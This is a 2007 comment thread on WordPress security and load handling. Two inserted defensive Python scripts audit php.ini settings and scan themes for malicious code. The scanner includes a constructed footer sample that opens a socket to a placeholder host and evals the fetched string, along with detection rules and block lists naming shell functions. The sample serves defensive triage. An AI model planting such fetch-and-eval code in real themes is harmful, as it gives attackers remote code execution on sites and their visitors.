27 Comments
- inactive, on 11/27/2007, -8/+27: WordPress should first fix the Digg effect.
- thailand1972, on 11/27/2007, -6/+14: A denial of service attack on a WP blog..... just get yourself and 2 friends to hit the same WP site at the same time...
- farrukhblogger, on 11/27/2007, -0/+6: This article gives a new level of understanding regarding security issues with the WordPress platform. It's WordPress who needs to come into action, and only then can we have something substantial. The proposed idea of certification for themes and plugins is an intelligent one and we need to look into it, since it will save many newbies like myself from getting trapped in any malicious act. Thanks for writing such a nice article.
- lucidguru, on 11/27/2007, -1/+6: WP-Cache?
- headzoo, on 11/27/2007, -1/+6: You mean lousy web hosts need to fix the Digg effect. It's been pointed out time and again that sites like TechCrunch use WordPress, and they live with the Digg effect 24/7. I've been dugg in the past, and my WP blog held up just fine (even without using wp-cache). That's because I don't use Cheap-O-Matic Inc. web hosting. I don't use expensive hosting either. But when you pay $4 a month for hosting, you get what you paid for.
- inactive, on 11/27/2007, -3/+6: WordPress needs a better posting system.
- Rammsteined, on 11/27/2007, -5/+8: WordPress is poorly designed from the start, just like a lot of other (mostly older) PHP scripts.
This might sound like general bashing of PHP, but it isn't, because it's perfectly possible to write a secure, easy to use, easy to customize script in PHP, exactly what WordPress is not.
If you want to look at a well written script, have a look at MyTopix (yeah, a forum), it uses a well thought out OOP software design and even better, it uses XSL for templating. See http://jaia-interactive.com/.
And no, I'm not affiliated with MyTopix in any way - I don't even use it!
- fak3r, on 11/27/2007, -0/+3: Patch the roots first, then WordPress later.
PHP - Suhosin (hardened PHP)
PHP - secure php.ini (do a Google search)
MySQL - locked down my.cnf
WWW - well locked down www server (I now use Lighttpd, but Apache can be very secure too, just more to config)
System - should go without saying, but lock your system down (I use Debian because it's easy)
- richardiscool, on 11/27/2007, -3/+5: I thought that was the WordPress slogan?
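An added example, not code from the page or from any of the commenters: a small Python audit of the "secure php.ini" step in fak3r's list above. It parses a php.ini and reports the directives that leak information to visitors or widen the attack surface: expose_php, display_errors (with log_errors as the replacement), allow_url_fopen and allow_url_include, register_globals, an empty open_basedir, and shell-spawning functions missing from disable_functions. Both php.ini samples are constructed for the example, and the baseline is my own 2007-era choice, not a list the page gives. The parser assumes Unix-style values; on Windows open_basedir uses ';' as a separator, which this reader would treat as a comment.

```python
# Added example: audit a php.ini against a hardened baseline.
# Sample files are constructed here; the baseline directives are my choice.

WEAK_INI = """\
; constructed sample: a lax php.ini of the kind a cheap 2007 shared host shipped
[PHP]
expose_php = On
display_errors = On
log_errors = Off
allow_url_fopen = On
allow_url_include = Off
register_globals = Off
disable_functions =
open_basedir =
"""

HARDENED_INI = """\
; constructed sample: the same directives after hardening
[PHP]
expose_php = Off
display_errors = Off
log_errors = On
error_log = /var/log/php_errors.log
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
open_basedir = /var/www/blog:/tmp
"""

# Directives that must be on or off; each comment says what the setting stops.
EXPECTED_BOOL = {
    "expose_php": "off",        # drops the "X-Powered-By: PHP/x.y.z" response header
    "display_errors": "off",    # no paths, queries or stack traces in visitors' browsers
    "log_errors": "on",         # ...but keep them in a log you can read later
    "allow_url_fopen": "off",   # include()/file_get_contents() can no longer pull http:// URLs
    "allow_url_include": "off",
    "register_globals": "off",  # the classic PHP 4/5 footgun (removed in PHP 5.4)
}
# Directives that must carry a non-empty value.
EXPECTED_NONEMPTY = ["open_basedir"]  # confine file access to the blog's own tree
# Shell-spawning functions a blog host has no business exposing.
DANGEROUS_FUNCTIONS = ["exec", "passthru", "shell_exec", "system", "proc_open", "popen"]

_TRUE = {"1", "on", "yes", "true"}
_FALSE = {"0", "off", "no", "false", "none", ""}


def parse_php_ini(text):
    """Minimal php.ini reader: strips ';' comments and [sections]; last value wins.
    Assumes Unix-style values (no ';' inside a value, unlike Windows open_basedir)."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        directives[key.strip().lower()] = value.strip().strip('"')
    return directives


def as_bool(value):
    """Normalise PHP's many spellings of true/false to 'on'/'off'."""
    v = value.strip().lower()
    if v in _TRUE:
        return "on"
    if v in _FALSE:
        return "off"
    return v  # unrecognised token: reported verbatim so a human can look at it


def audit_php_ini(text):
    """Return a list of (directive, current, expected) for every deviation."""
    d = parse_php_ini(text)
    findings = []
    for key, want in EXPECTED_BOOL.items():
        if key not in d:
            # An absent directive falls back to PHP's compiled-in default, which
            # differs between versions, so "unset" is itself a finding.
            findings.append((key, "unset", want))
        elif as_bool(d[key]) != want:
            findings.append((key, as_bool(d[key]), want))
    for key in EXPECTED_NONEMPTY:
        if not d.get(key, ""):
            findings.append((key, "unset" if key not in d else "empty", "non-empty path list"))
    disabled = {f.strip() for f in d.get("disable_functions", "").split(",") if f.strip()}
    missing = [f for f in DANGEROUS_FUNCTIONS if f not in disabled]
    if missing:
        findings.append(("disable_functions", "missing " + ",".join(missing),
                         "list includes " + ",".join(DANGEROUS_FUNCTIONS)))
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        results = audit_php_ini(ini)
        print(f"{name}: {len(results)} finding(s)")
        for directive, current, expected in results:
            print(f"  {directive}: is {current!r}, want {expected!r}")
```

Point it at a real file with `audit_php_ini(open("/etc/php5/apache2/php.ini").read())`; switching allow_url_fopen off can break plugins that fetch remote feeds with file_get_contents(), so check those after the change.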
- theotheragentm, on 11/27/2007, -0/+2: Don't forget WP Super Cache. http://ocaoimh.ie/2007/11/26/digg-users-will-love- ...
- Aroundtown27, on 11/27/2007, -6/+8: The only reason I clicked on the headline was to see if it was down.....
- Rammsteined, on 12/18/2007, -0/+1: Downloads are on the forum, sorry.
- aweblogs, on 11/27/2007, -3/+4: Where you download a theme is quite important; some designers place code in the footer to prevent us from editing the theme and removing the links in the footer.
Top 10 theme download sites:
http://wpthemesplugin.com/top-10-alternative-wordp ...
- shad0bear, on 11/27/2007, -0/+1: There are better ways to track who is using your theme. You could embed an image into the theme that is a 1 pixel transparent gif located on your site. Then you just parse your log files to get the Referer for the requests.
I agree with fak3r. You need to lock down the server first. I also suggest running Apache in a chroot if possible. Plus disable Server Signatures and PHP error generation too. You don't want any information leaking to a potential hacker about your setup.
- fak3r, on 11/27/2007, -1/+2: "because it's perfectly possible to write a secure, easy to use, easy to customize script in PHP"
This is the point I always try to make: it's not that PHP is inherently bad, it's just that it's very simple to make it do things; thus most of the time it's not coded the way it should be for security. It's like saying a car is unsafe because there are a lot of accidents.
- BlaenkDenum, on 12/08/2007, -0/+1: It's not WordPress... It's the web hosting and what the user puts on a page. If the author uses AJAX to wipe his ass and has tons of widgets and images and scripts, it will take even longer to load, making the chances of it not surviving the Digg effect more likely.
WP-Cache, although great at the time, is old and should not be used anymore. The future is with WP-SuperCache, which still uses WP-Cache in a way.
- farr, on 11/27/2007, -0/+1: This is a great general practice, but in this case all the PHP is doing is including JavaScript. The threat is not to the server at all, but rather in downloaded JavaScript that is presented to visitors. What WP should do is limit the kinds of code that can be executed in their themes!
- gbak39, on 12/04/2007, -0/+0: Because blogs are such widely used tools on the internet, it only makes sense that hackers are now targeting them. WordPress users need to be more aware of this type of activity and take the proper security actions to protect their sites.
- phenomina3, on 11/29/2007, -0/+0: This is legit!! It would be really cool for up and coming programmers to practice. But it could also be pretty bad if a hacker gets into it. It's just a fun program that lets people write code while expressing themselves. Just leave it alone.....
- acroll, on 11/28/2007, -0/+0: Actually, what it's doing is pulling in an arbitrary string that WordPress is then parsing as an additional PHP tag. It can be anything. I had a close look at the structure of the exploit and it opens a socket, pulls in a string, then tells PHP to evaluate it. That could be as simple as sending out a print statement of HTML, or something nastier.
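An added example, not code from the page, from WordPress, or from any commenter: a Python scanner for the two points raised above, farr's observation that the danger in a theme is the code it injects into served pages, and acroll's description of a footer that opens a socket, pulls in a string and hands it to eval. It also flags the obfuscated footer links and 1x1 tracking images the theme-download comments mention. The sample footer is constructed here to mimic those patterns (it contacts nothing; the hostnames are in the reserved .invalid TLD) and is not the exploit the article is about; the rule list and severities are my own. The scanner is a triage tool for a theme you downloaded, not a proof that a theme is clean: attackers can split strings or encode differently to dodge any fixed pattern.

```python
# Added example: flag code-execution and call-home patterns in WordPress theme files.
import base64
import binascii
import os
import re
import sys

# Constructed sample: a footer.php mimicking the pattern described above (socket
# to a remote host, read a string, eval it), an obfuscated footer link, and an
# external 1x1 tracking image. Nothing here is reachable; .invalid is a reserved TLD.
_HIDDEN_LINK = base64.b64encode(b'<a href="http://example.invalid">sponsor</a>').decode()
SAMPLE_FOOTER = "\n".join([
    "<?php",
    '$fp = fsockopen("example.invalid", 80, $errno, $errstr, 5);',
    '$payload = "";',
    "while (!feof($fp)) { $payload .= fgets($fp, 1024); }",
    "eval($payload);",
    f'echo base64_decode("{_HIDDEN_LINK}");',
    "?>",
    '<img src="http://tracker.example.invalid/p.gif" width="1" height="1" alt="" />',
    "<p>Powered by WordPress</p>",
])
CLEAN_FOOTER = "<?php wp_footer(); ?>\n<p>Powered by WordPress</p>\n"

# (rule name, pattern, severity). A legitimate theme template has no reason to
# evaluate strings, open sockets, or decode base64 at render time.
RULES = [(name, re.compile(pat, re.IGNORECASE), sev) for name, pat, sev in [
    ("eval", r"\beval\s*\(", "high"),
    ("remote-socket", r"\b(p?fsockopen|stream_socket_client|curl_init)\s*\(", "high"),
    ("remote-include", r"\b(include|require)(_once)?\b[\s(]*['\"]?(https?|ftp)://", "high"),
    ("file-get-url", r"\bfile_get_contents\s*\(\s*['\"]?(https?|ftp)://", "high"),
    # preg_replace with the /e modifier evaluates the replacement as PHP.
    ("preg-replace-e", r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]", "high"),
    ("shell-function", r"\b(system|shell_exec|passthru|exec|proc_open|popen|create_function|assert)\s*\(", "medium"),
    ("base64", r"\bbase64_decode\s*\(", "medium"),
    # An external image forced to 1x1: a tracking pixel, not part of the design.
    ("tracking-pixel", r"<img\b[^>]*\bsrc=[\"']https?://[^>]*\b(width=[\"']1[\"'][^>]*\bheight=[\"']1[\"']|height=[\"']1[\"'][^>]*\bwidth=[\"']1[\"'])", "low"),
]]

_B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")


def scan(source, filename="<string>"):
    """Return [(filename, line_no, rule, severity)] for every line that trips a rule."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for name, pattern, severity in RULES:
            if pattern.search(line):
                findings.append((filename, line_no, name, severity))
    return findings


def scan_directory(root, extensions=(".php", ".html", ".htm", ".js")):
    """Scan every template file under a theme directory."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(extensions):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan(fh.read(), path))
    return findings


def decode_base64_literals(source):
    """Decode the string literals passed to base64_decode() so a reviewer can read them."""
    decoded = []
    for m in _B64_ARG.finditer(source):
        blob = "".join(m.group(1).split())
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("<undecodable>")
    return decoded


def verdict(findings):
    """'reject' on any high finding, 'review' on medium, otherwise 'ok'."""
    severities = {f[3] for f in findings}
    if "high" in severities:
        return "reject"
    if "medium" in severities:
        return "review"
    return "ok"


if __name__ == "__main__":
    # Usage: python theme_scan.py /path/to/wp-content/themes/some-theme
    if len(sys.argv) > 1:
        results = scan_directory(sys.argv[1])
    else:
        results = scan(SAMPLE_FOOTER, "sample-footer.php")
        for text in decode_base64_literals(SAMPLE_FOOTER):
            print("decoded base64 literal:", text)
    for filename, line_no, rule, severity in results:
        print(f"{severity:6} {filename}:{line_no} {rule}")
    print("verdict:", verdict(results))
```

On the constructed footer the scanner reports the socket open, the eval, the base64 call and the pixel, decodes the hidden link to a plain `<a href>` so you can see where it points, and returns "reject"; the clean footer produces no findings.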
- senorjt, on 11/27/2007, -1/+1: Well, you state this with such authority, so I clicked on the link looking for a whitepaper or downloadable code. I found neither. So, are you privy to insider info, or do you make your judgment of the product's superior design based on UI and workflow issues only?
Curious.
- PARAPA, on 11/27/2007, -4/+4: "Error establishing database connection"...
- ertz, on 11/27/2007, -4/+4: Like I had something worth hacking on my weblog. Just GPL'd icons...
- V1ncent, on 11/27/2007, -1/+1: It's not WordPress that's growing quickly, it's the number of crashes per install.
- jonathankimmm, on 11/27/2007, -4/+2: I smell a movie in the making..........
- munky100, on 11/27/2007, -3/+1: The theme creators can also input their own code to track who is using their themes; it's not always the download sites who are doing it!
- funkyjunk3, on 11/27/2007, -6/+3: WordPress - the bane of the Digg front page